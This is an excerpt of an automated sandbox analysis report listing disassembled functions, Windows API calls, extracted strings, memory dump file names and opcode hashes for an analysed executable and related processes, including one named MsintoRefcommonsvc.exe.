Part of subcall function 00126C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00126C54

Strings

CreateThread failed, xrefs: 0013104F

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: f188b7d38132e57edb9838845fc1469eeee966a01b1bcb216dcbca5b63e229b3
Instruction ID: c5c934125a96b86ecabbd644fd9be1d92aa8db838d146b1670b84162a9ff22ea
Opcode Fuzzy Hash: f188b7d38132e57edb9838845fc1469eeee966a01b1bcb216dcbca5b63e229b3
Instruction Fuzzy Hash: 2C01F9B534430DBFD7346F64ED51B76B399EB50751F20042EFA86962C0CFA168E58624

Uniqueness

Uniqueness Score: -1.00%

Function 00121316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0012E2E8: _swprintf.LIBCMT ref: 0012E30E
Part of subcall function 0012E2E8: _strlen.LIBCMT ref: 0012E32F
Part of subcall function 0012E2E8: SetDlgItemTextW.USER32(?,0015E274,?), ref: 0012E38F
Part of subcall function 0012E2E8: GetWindowRect.USER32(?,?), ref: 0012E3C9
Part of subcall function 0012E2E8: GetClientRect.USER32(?,?), ref: 0012E3D5

GetDlgItem.USER32(00000000,00003021), ref: 0012135A
SetWindowTextW.USER32(00000000,001535F4), ref: 00121370

Strings

0, xrefs: 00121319

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 3a4e90eb558fb726629eb3356895631aacd36823466a53534c133db894bb805e
Instruction ID: 7fe3eaea2698d712f9d67310c671d4a7e97a65f7ea8c6659260a182e19fbf642
Opcode Fuzzy Hash: 3a4e90eb558fb726629eb3356895631aacd36823466a53534c133db894bb805e
Instruction Fuzzy Hash: 84F0AF311042A8BADF15CF60EC0DBEA3B9BBF207A4F098114FC55959A1DB74CAB0EB10

Uniqueness

Uniqueness Score: -1.00%

Function 00130FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00131206,?), ref: 00130FEA
GetLastError.KERNEL32(?), ref: 00130FF6

Part of subcall function 00126C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00126C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00130FFF

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 267c7a75fe0ac521680319ebcf54208cb831e790323491d1f0d312b4379b8625
Instruction ID: 8f27adb36805b41c61bcf0c8178931f3e5bc38360d37a0fc7bc7130755559af1
Opcode Fuzzy Hash: 267c7a75fe0ac521680319ebcf54208cb831e790323491d1f0d312b4379b8625
Instruction Fuzzy Hash: BFD05E72508730BBCA113324AD0AD6F79059B22772F640B14F5396A6F6CB254AF1A6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0012E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0012DA55,?), ref: 0012E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0012DA55,?), ref: 0012E2B1

Strings

RTL, xrefs: 0012E2AB

Memory Dump Source

Source File: 00000000.00000002.1643815804.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.1643793875.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643851950.0000000000153000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.000000000015E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643874766.0000000000182000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1643942061.0000000000183000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_yX8787W7de.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 56fb6db762e8c785c76e631ff627a8f54db22f674023441c28aec1b7410d84fc
Instruction ID: c58aea512ab65f99dd11f881cbaeda48eaaecf565f0059aa6166fc4b3770ff75
Opcode Fuzzy Hash: 56fb6db762e8c785c76e631ff627a8f54db22f674023441c28aec1b7410d84fc
Instruction Fuzzy Hash: 6CC01231240720E6EA3067757C0DB87AA985B00B92F09044CB6A2EF6D1EBA5C99486A0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MsintoRefcommonsvc.exePID: 5340, Parent PID: 3744COMMON

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BAA0D48 Relevance: 1.5, Strings: 1, Instructions: 259
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5[_H, xrefs: 00007FFD9BAA0DF3

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID: 5[_H
API String ID: 0-3279724263
Opcode ID: f4d1c7d1db8b8058bbc5952c1421a5f395c44d2a098ad582022528b3b12a19d8
Instruction ID: fec59c64a06e6429cc2cef6b4b913fa4bbe573ccdb08e6ffd7d7e77ba1980451
Opcode Fuzzy Hash: f4d1c7d1db8b8058bbc5952c1421a5f395c44d2a098ad582022528b3b12a19d8
Instruction Fuzzy Hash: 12911476A19A8D8FE798DF6888657A97BE1FF99714F0001BED00DD72E6CBB81801C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BE4140A Relevance: 1.7, APIs: 1, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNELBASE ref: 00007FFD9BE41561

Memory Dump Source

Source File: 00000005.00000002.1898919097.00007FFD9BE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9be40000_MsintoRefcommonsvc.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 867cea8792676ea61d74e468732904cff760398bab37a806ed795e7197468869
Instruction ID: 249d60964e87b60bc80d0dba5ce0535464c9343e3d54cee4ed8ec1918967a9c8
Opcode Fuzzy Hash: 867cea8792676ea61d74e468732904cff760398bab37a806ed795e7197468869
Instruction Fuzzy Hash: 75517F30618A4D8FDB68DF28C8557F977E2FB68305F14423EE84EC7292CB75A9418B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA08D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c4d22355b3dbbb6b5659ea3e9930f0331f2c42c1ee8f58db964bc01077d13e3
Instruction ID: d7d0472323b014fbc78833a86373bd52370259c9186a0526d583be300630e049
Opcode Fuzzy Hash: 1c4d22355b3dbbb6b5659ea3e9930f0331f2c42c1ee8f58db964bc01077d13e3
Instruction Fuzzy Hash: A0413822B0C5190EE318F7ACA4A56F977C1EF9933AB0441FBE44ECB1E7CD186841C294

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0998 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 341c77c1df9018143e8ce80e001eff111daf10b8466bc1f9d2705ae32c2bb748
Instruction ID: e8bc691399a7b7f57ce482d369c2ffe11084dcbcbac9f45307e8ac75c1315d8d
Opcode Fuzzy Hash: 341c77c1df9018143e8ce80e001eff111daf10b8466bc1f9d2705ae32c2bb748
Instruction Fuzzy Hash: 5D210521B1D91D0FE79CF76C946A67976C2EF98325F0101B9E40EC32E6DD58AC418291

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA1171 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ff103277b5d66b809b27e133f08588ca08507bd91a9a2526c8e37407bb5878f
Instruction ID: 2f56a66a06f439e4f011c22fe39e6add8f65cbbe78127f124141f412829f95d3
Opcode Fuzzy Hash: 8ff103277b5d66b809b27e133f08588ca08507bd91a9a2526c8e37407bb5878f
Instruction Fuzzy Hash: 7031B431A0D68A8FDB46EB64C8649A97FF1FF6A300B0902BBC009C71E2DA68A545C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd76f6c41224b3e41e27e451f92bf15da4b17d4b338ba73129773ecd11f7abaf
Instruction ID: a8876f168ad7128819f4255f7c6fd9117fc64b0a31c22683b88a41d026d5996c
Opcode Fuzzy Hash: cd76f6c41224b3e41e27e451f92bf15da4b17d4b338ba73129773ecd11f7abaf
Instruction Fuzzy Hash: 8B214936B0E24E4BE731ABB898610EC7B60EF82725F1545B3D05C8F1D3D978268AC764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA5D44 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da19c41ba25e4b1da7f34ee0248a71ee32c6f5fbce445bb1335069c5ea354d07
Instruction ID: 2d871a822e5c45c2b229728af447e5dc68c59f49784e855c9e7f20119d9f34a5
Opcode Fuzzy Hash: da19c41ba25e4b1da7f34ee0248a71ee32c6f5fbce445bb1335069c5ea354d07
Instruction Fuzzy Hash: 94213D3091951D8FDBA8DB04C899BB8B3E2FB58301F5081A9D44ED36A1DE746AC5CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA3F9C Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05100c68fdc2f42d421a8bb1fbed838313e9c782f0b7f883cfe65760631fcd00
Instruction ID: 2439749d463ff6cb26aa282ec9fc9302d777dfecc69f92f3e16c32f3c811b539
Opcode Fuzzy Hash: 05100c68fdc2f42d421a8bb1fbed838313e9c782f0b7f883cfe65760631fcd00
Instruction Fuzzy Hash: 6C113321F0D90D4FFAF4E7A8846967812D3DFA5710F0A41B5D44EC72F2DCA8AD418714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d1ed2ffe1f283428ec8fde10915c06e7bcd015646a801313226b74349ca9801
Instruction ID: 8c42a19aef98b639fe5491ea378d675d31928c28f3930094117ed431de0d5003
Opcode Fuzzy Hash: 3d1ed2ffe1f283428ec8fde10915c06e7bcd015646a801313226b74349ca9801
Instruction Fuzzy Hash: 7D110636B0E24D8FE721DFA884601DC7BB1EF42711F0645B3C048DB1A2D574264A87A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA65B6 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13f5bb37cc1a698f5faa0f830aa3a51ad1c565245cb0b9e5da6f69e511031b50
Instruction ID: 2411a90a2096bf90ffb28eef2dbf406c92e97af9cbc38fd100e9107bbd828e57
Opcode Fuzzy Hash: 13f5bb37cc1a698f5faa0f830aa3a51ad1c565245cb0b9e5da6f69e511031b50
Instruction Fuzzy Hash: E611A320E0D50E4FEBB8E758D86A6B87392FF49700F1141B9D84DD32F2EE786A414A91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3af64785369c322c95d857d43f6f4df44217916251fc380a52d36a7ed7bd3ad4
Instruction ID: 0f146cf45537fcfa793adf1d87d05fd8e3f0d6e76c80f81cc1ea63e2320faf2b
Opcode Fuzzy Hash: 3af64785369c322c95d857d43f6f4df44217916251fc380a52d36a7ed7bd3ad4
Instruction Fuzzy Hash: BB01C436A0E28D8FE721DFA8C4A01DD7FB1EF42711F1645B7D048DB2A2D97426498764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 804ffaef7b103c31aef2394cc4852c3bd1b2e6bcff2a305eac9b9d494b3c72b9
Instruction ID: 17e40da35f60333fb23485328bb7e31bd29e4a2f88d4d36c69688e1b52fcf999
Opcode Fuzzy Hash: 804ffaef7b103c31aef2394cc4852c3bd1b2e6bcff2a305eac9b9d494b3c72b9
Instruction Fuzzy Hash: 72019235A0E28D9FD721DFA4C8900DCBFB1EF02714F1541E7D048DB2A2D97466458750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56b72fda892fd0132398d44c2f299ca1b5cc0c2004c56f1a44ae262e2ba1031a
Instruction ID: d6e4c235a35327af0d00a832b179b663e2dc12428505b8acbeee51a0764467f0
Opcode Fuzzy Hash: 56b72fda892fd0132398d44c2f299ca1b5cc0c2004c56f1a44ae262e2ba1031a
Instruction Fuzzy Hash: 76018F35E0E28D9FEB21DFA488A00DDBFB1EF02714F1541E7D058DB2A2D9786A458754

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA6685 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3845596c4327085e7b812ed148a093c9f00aa9766b84abd82ff29e7f96efc8
Instruction ID: f3017b5c257940a2da8828bcb3b2ada22cc86ee3181a6f653d0a7df30af73cde
Opcode Fuzzy Hash: dd3845596c4327085e7b812ed148a093c9f00aa9766b84abd82ff29e7f96efc8
Instruction Fuzzy Hash: 0A013630A4941E8EEB7CEB54D8696F873A2FF54700F1101BAD44DD31B2DE7C6A818A15

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0B95 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04d912cce1882ab70d92727893cd92ef9cb98564b3ceceef573e0c620fa50dcd
Instruction ID: d1f90391895e95098fcf59eb18a2def838da6cbe6578d6223bcb966fd047abfb
Opcode Fuzzy Hash: 04d912cce1882ab70d92727893cd92ef9cb98564b3ceceef573e0c620fa50dcd
Instruction Fuzzy Hash: A8D0A73021994E4FC644B778C8594247BA0FB0F210BC510E5E048C7572C54848558704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa3e88ead1a5968ade0eab6eeff9c87bbbb2a8a6dba60173493ab4d5c8c8aeec
Instruction ID: c69950b81a92ef1f15f9ade63b0b411c1f11a0f28786b472d33a019d060283e7
Opcode Fuzzy Hash: aa3e88ead1a5968ade0eab6eeff9c87bbbb2a8a6dba60173493ab4d5c8c8aeec
Instruction Fuzzy Hash: 8DC00205F5B51E41E43673AA54660ADA2425BD5F14FD70572D50C800A19CDD229A026A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA12B0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e72a1dd12a1fa5ad6107b0b1f5d18ee6a3dff9ded8a12d14089a41ed64f2f248
Instruction ID: ad21155f5929b4340488a01e265f3aca6972bde9f03f1cfbc21dff3670623948
Opcode Fuzzy Hash: e72a1dd12a1fa5ad6107b0b1f5d18ee6a3dff9ded8a12d14089a41ed64f2f248
Instruction Fuzzy Hash: 00C08C3051580C8FC948EB29C88880437E0FB09314BC20090E008C7170D259DCC0C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74f9ae3dc107e225bd3989dbdbb68dc79b92d57736b24654e32bc5322a855044
Instruction ID: 8fa141111852f097d445b69c7fd0be198dfd7b7d862507f1d9e476ea019c8cfd
Opcode Fuzzy Hash: 74f9ae3dc107e225bd3989dbdbb68dc79b92d57736b24654e32bc5322a855044
Instruction Fuzzy Hash: 87B01200D5740F00E43433FA08A20AD70425B44300FC20070D40C80091DCCD229D0367

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA25F3 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd5382d58ee3f1554fd1ae4c018962395e7343b6992d843b74c670da6b60efd0
Instruction ID: 518bd3fd7dcd03cac49325454520f64e380ebd945781a08aba8e8dc240c8e634
Opcode Fuzzy Hash: cd5382d58ee3f1554fd1ae4c018962395e7343b6992d843b74c670da6b60efd0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD9BAA09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FFD9BAA0B3E
c9, xrefs: 00007FFD9BAA0B56
"s9, xrefs: 00007FFD9BAA0B46
!k9, xrefs: 00007FFD9BAA0B4E

Memory Dump Source

Source File: 00000005.00000002.1894205675.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 0407283b7d2cc3fed0501aff7ac6c99f5ee18bf0a9996aa11acc98db60870b86
Instruction ID: 191aa620d6c15ff23ed97f6d5c76e8285049bb97e991ee64ef2b7805c5890ecf
Opcode Fuzzy Hash: 0407283b7d2cc3fed0501aff7ac6c99f5ee18bf0a9996aa11acc98db60870b86
Instruction Fuzzy Hash: E841CC17B0952645E23973FD78219EC6B408FA923FB0847B7F96E8D0C78C082486C2E9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: conhost.exePID: 7184, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9BAD0D48 Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

5X_H, xrefs: 00007FFD9BAD0DF3

Memory Dump Source

Source File: 0000001F.00000002.2001208376.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9bad0000_conhost.jbxd

Similarity

API ID:
String ID: 5X_H
API String ID: 0-3241812158
Opcode ID: 7a4cf36ee7d88902cf141e1a3dfb85c0f3409c06b96f22315a5dabe8ec6d3485
Instruction ID: aa5b60904242a675152b2f0fdacc06fa11e683604d4c9761f575248d20721576
Opcode Fuzzy Hash: 7a4cf36ee7d88902cf141e1a3dfb85c0f3409c06b96f22315a5dabe8ec6d3485
Instruction Fuzzy Hash: 7E91F575A19A8D8FE799DB6888757A97BE0FF99314F0102BFD049C72E6CBB82401C744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BE74F69 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.2004958819.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9be70000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10f11d5e2b3f1868d10401e8c7a9de8dc912c0ca7fc66fd27bcab3a1ecb39392
Instruction ID: 7dae51933692e4bf72514b635749cd982fd98f45dbfd00e6fb613f0ddcec641b
Opcode Fuzzy Hash: 10f11d5e2b3f1868d10401e8c7a9de8dc912c0ca7fc66fd27bcab3a1ecb39392
Instruction Fuzzy Hash: F2C11730B19A0D4FE7A8E76884B96B873D5FF98314F4501BAD44EC32E2DE297D428741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BE782D9 Relevance: 1.3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BE782F6

Memory Dump Source

Source File: 0000001F.00000002.2004958819.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9be70000_conhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 0aeee8467178b06a617035bcb44ee4d2ff8a8503c0c2170d4998544dd33ff07a
Instruction ID: 2ebc86c140f8c51b34621bfacda3a379567a7ec374b88fc5db8be69ec3a8ffa3
Opcode Fuzzy Hash: 0aeee8467178b06a617035bcb44ee4d2ff8a8503c0c2170d4998544dd33ff07a
Instruction Fuzzy Hash: 05F0656190E7D44FC716DA7588698557FA0EE6720178942EFC045CF1A3EA2DC889C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BE77A79 Relevance: 1.3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BE77A96

Memory Dump Source

Source File: 0000001F.00000002.2004958819.00007FFD9BE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffd9be70000_conhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 98f74946fc551746039759a3226128bc1f03b678e72729f0fc9f0d179777384d
Instruction ID: 25d301f1809dbfb96d97483ef0d3a8e0f9e57b739d1409ec58e042eaa7f4ae20
Opcode Fuzzy Hash: 98f74946fc551746039759a3226128bc1f03b678e72729f0fc9f0d179777384d
